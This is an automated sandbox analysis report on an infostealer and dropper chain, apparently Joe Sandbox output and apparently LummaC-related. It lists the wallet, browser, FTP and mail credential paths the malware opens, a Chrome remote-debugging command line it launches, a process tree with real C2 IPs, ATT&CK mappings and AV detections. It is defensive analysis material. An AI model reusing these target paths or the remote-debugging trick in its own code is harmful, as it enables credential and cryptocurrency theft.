                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetter
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfo
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Roaming\FTPbox
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Roaming\FTPRush
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTP
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Binance\
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe | File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe | File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe | File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe | File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe | File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe | File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe | File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe | File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe | File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe | File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe | File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe | File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe | File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe | Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe | Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe | Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe | Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe | Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe | Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe | Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe | Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe | Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe | Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe | Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe | Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe | Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe | Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe | Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe | Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe | Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe | Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe | Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe | Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe | Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe | Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe | Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe | Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe | Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe | Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe | Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe | Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe | Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe | Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe | Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe | Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe | Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe | Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe | Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe | Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe | Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe | Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe | Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe | Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe | Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe | Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe | Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe | Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe | Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe | Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe | Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe | Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe | Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe | Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe | Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe | Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe | Directory queried: number of queries: 1001
Source: Yara match | File source: Process Memory Space: 7d28d37061cb43098969a37cf25a380a.exe PID: 5916, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: 77594b3442.exe PID: 7456, type: MEMORYSTR

                      Remote Access Functionality

Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: Yara match | File source: Process Memory Space: 9d4ddc637a.exe PID: 5600, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: 77594b3442.exe PID: 7456, type: MEMORYSTR
Source: Yara match | File source: 00000038.00000003.2987064495.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 513dad5c05.exe PID: 7432, type: MEMORYSTR
Source: Yara match | File source: 43.0.7d28d37061cb43098969a37cf25a380a.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000F.00000002.2742198429.0000000003B95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2742198429.0000000003CBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 4268204ace.exe PID: 7312, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: 7d28d37061cb43098969a37cf25a380a.exe PID: 5916, type: MEMORYSTR
Source: Yara match | File source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe, type: DROPPED
MITRE ATT&CK Matrix

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 1 Scripting | Valid Accounts | 2 Windows Management Instrumentation | 1 Scripting | 1 DLL Side-Loading | 11 Disable or Modify Tools | 2 OS Credential Dumping | 1 System Time Discovery | Remote Services | 11 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 11 Native API | 1 DLL Side-Loading | 1 Access Token Manipulation | 11 Deobfuscate/Decode Files or Information | 1 Credentials in Registry | 24 File and Directory Discovery | Remote Desktop Protocol | 31 Data from Local System | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 12 Command and Scripting Interpreter | 11 Scheduled Task/Job | 212 Process Injection | 5 Obfuscated Files or Information | Security Account Manager | 2510 System Information Discovery | SMB/Windows Admin Shares | 1 Email Collection | 1 Remote Access Software | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | 11 Scheduled Task/Job | 11 Registry Run Keys / Startup Folder | 11 Scheduled Task/Job | 13 Software Packing | NTDS | 981 Security Software Discovery | Distributed Component Object Model | Input Capture | 1 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | 2 PowerShell | Network Logon Script | 11 Registry Run Keys / Startup Folder | 1 Timestomp | LSA Secrets | 3 Process Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 381 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 21 Masquerading | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 381 Virtualization/Sandbox Evasion | Proc Filesystem | 11 Remote System Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Access Token Manipulation | /etc/passwd and /etc/shadow | 1 System Network Configuration Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 212 Process Injection | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Behavior Graph

Behavior Graph ID: 1579188; Sample: file.exe; Start date: 21/12/2024; Architecture: WINDOWS; Score: 100
Signatures on the sample: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for dropped file; 19 other signatures

Process tree (graph node ids in parentheses; "Network" lists contacted IPs, "Dropped" lists written files, "Signatures" lists behaviour signatures attached to that node):

• skotes.exe (10)
  Network: 185.215.113.43 WHOLESALECONNECTIONSNL Portugal; 185.215.113.16 WHOLESALECONNECTIONSNL Portugal; 31.41.244.11 AEROEXPRESS-ASRU Russian Federation
  Dropped: C:\Users\user\AppData\...\73c096c84a.exe (PE32); C:\Users\user\AppData\...\d7884c562e.exe (PE32); C:\Users\user\AppData\...\fcd2b0e3cd.exe (PE32); 25 other malicious files
  Signatures: Creates multiple autostart registry keys; Hides threads from debuggers; Tries to detect sandboxes / dynamic malware analysis system (registry check)
  Started: 513dad5c05.exe (21); 77594b3442.exe (26); 4268204ace.exe (28); 4 other processes (40)
  • 513dad5c05.exe (21)
    Network: 185.215.113.206 WHOLESALECONNECTIONSNL Portugal
    Dropped: C:\Users\user\Documents\CAAEBKEGHJ.exe (PE32); 13 other files (9 malicious)
    Signatures: Drops PE files to the document folder of the user; Tries to steal Mail credentials (via file / registry access); 6 other signatures
    Started: chrome.exe (42)
  • 77594b3442.exe (26)
    Network: 104.21.21.99 CLOUDFLARENETUS United States
    Dropped: C:\Users\user\...\MCGXXRICH6C9X2RWLNL.exe (PE32); C:\Users\user\...\975RDI33VTLWGIQACCE.exe (PE32)
    Signatures: Detected unpacking (changes PE section rights); Query firmware table information (likely to detect VMs); Tries to detect sandboxes and other dynamic analysis tools (window names); LummaC encrypted strings found
  • 4268204ace.exe (28)
    Network: 20.233.83.145 MICROSOFT-CORP-MSN-AS-BLOCKUS United States; 185.199.110.133 FASTLYUS Netherlands
    Dropped: C:\...\7d28d37061cb43098969a37cf25a380a.exe (PE32); C:\...\5119130eb96345a8a13dc770d0f33571.exe (PE32)
    Signatures: Multi AV Scanner detection for dropped file; Adds a directory exclusion to Windows Defender
    Started: 7d28d37061cb43098969a37cf25a380a.exe (44); powershell.exe (48); powershell.exe (50); 2 other processes (60)
    • 7d28d37061cb43098969a37cf25a380a.exe (44)
      Network: 149.154.167.99 TELEGRAMRU United Kingdom; 116.203.12.114 HETZNER-ASDE Germany
      Signatures: Attempt to bypass Chrome Application-Bound Encryption; Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); 3 other signatures
      Started: chrome.exe (62)
      • chrome.exe (62)
        Network: 239.255.255.250 unknown Reserved
        Started: chrome.exe (79)
        • chrome.exe (79)
          Network: 142.250.181.132 GOOGLEUS United States; 142.250.181.99 GOOGLEUS United States; 3 other IPs or domains
    • powershell.exe (48)
      Signatures: Loading BitLocker PowerShell Module
      Started: conhost.exe (65)
    • powershell.exe (50)
      Started: conhost.exe (67)
    • 2 other processes (60)
      Network: 184.30.21.144 AKAMAI-ASUS United States
  • 4 other processes (40)
    Network: 185.156.73.23 RELDAS-NETRU Russian Federation; 185.121.15.192 REDSERVICIOES Spain; 2 other IPs or domains
    Dropped: C:\Users\user\AppData\Local\...\Y-Cleaner.exe (PE32); C:\Users\user\...\Bunifu_UI_v1.5.3.dll (PE32); 4 other files (2 malicious)
    Signatures: Binary is likely a compiled AutoIt script file; 2 other signatures
    Started: cmd.exe (58)
    • cmd.exe (58)
      Signatures: Uses cmd line tools excessively to alter registry or file data
      Started: in.exe (69); 7z.exe (73); 7z.exe (75); 9 other processes (77)
      • in.exe (69)
        Dropped: C:\Users\...\Intel_PTT_EK_Recertification.exe (PE32+)
        Signatures: Suspicious powershell command line found; Uses cmd line tools excessively to alter registry or file data; Uses schtasks.exe or at.exe to add and modify task schedules
        Started: powershell.exe (82); attrib.exe (85); attrib.exe (87); schtasks.exe (89)
        • powershell.exe (82)
          Signatures: Uses ping.exe to check the status of other devices and networks
          Started: PING.EXE (91); conhost.exe (94)
          • PING.EXE (91)
            Network: 127.0.0.1 unknown unknown
        • attrib.exe (85)
          Started: conhost.exe (96)
        • attrib.exe (87)
          Started: conhost.exe (98)
        • schtasks.exe (89)
          Started: conhost.exe (100)
      • 7z.exe (73)
        Dropped: C:\Users\user\AppData\Local\Temp\...\in.exe (PE32+)
• file.exe (15)
  Dropped: C:\Users\user\AppData\Local\...\skotes.exe (PE32); C:\Users\user\...\skotes.exe:Zone.Identifier (ASCII)
  Signatures: Detected unpacking (changes PE section rights); Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors); Tries to evade debugger and weak emulator (self modifying code); Tries to detect virtualization through RDTSC time measurements
  Started: skotes.exe (30)
  • skotes.exe (30)
    Signatures: Creates HTML files with .exe extension (expired dropper behavior); 2 other signatures
• Intel_PTT_EK_Recertification.exe (17)
  Signatures: Suspicious powershell command line found; Found strings related to Crypto-Mining; Injects code into the Windows Explorer (explorer.exe)
  Started: powershell.exe (32); explorer.exe (34)
  • powershell.exe (32)
    Started: PING.EXE (52); conhost.exe (54)
    • PING.EXE (52)
      Network: 127.1.10.1 unknown unknown
• 3 other processes (19)
  Network: 184.30.17.174 AKAMAI-ASUS United States
  Signatures: Modifies the context of a thread in another process (thread injection); Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
  Started: powershell.exe (36); explorer.exe (38)
  • powershell.exe (36)
    Started: conhost.exe (56)

Antivirus, Machine Learning and Genetic Malware Detection: sample

Source | Detection | Scanner | Label
file.exe | 56% | Virustotal |
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |
Antivirus, Machine Learning and Genetic Malware Detection: dropped files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exe | 100% | Avira | TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe | 100% | Avira | HEUR/AGEN.1320706
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe | 100% | Avira | TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[3].exe | 100% | Avira | TR/Crypt.XPACK.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[4].exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[3].exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe | 100% | Joe Sandbox ML |
C:\ProgramData\freebl3.dll | 0% | ReversingLabs |
C:\ProgramData\freebl3.dll | 0% | Virustotal |
C:\ProgramData\mozglue.dll | 0% | ReversingLabs |
C:\ProgramData\mozglue.dll | 0% | Virustotal |
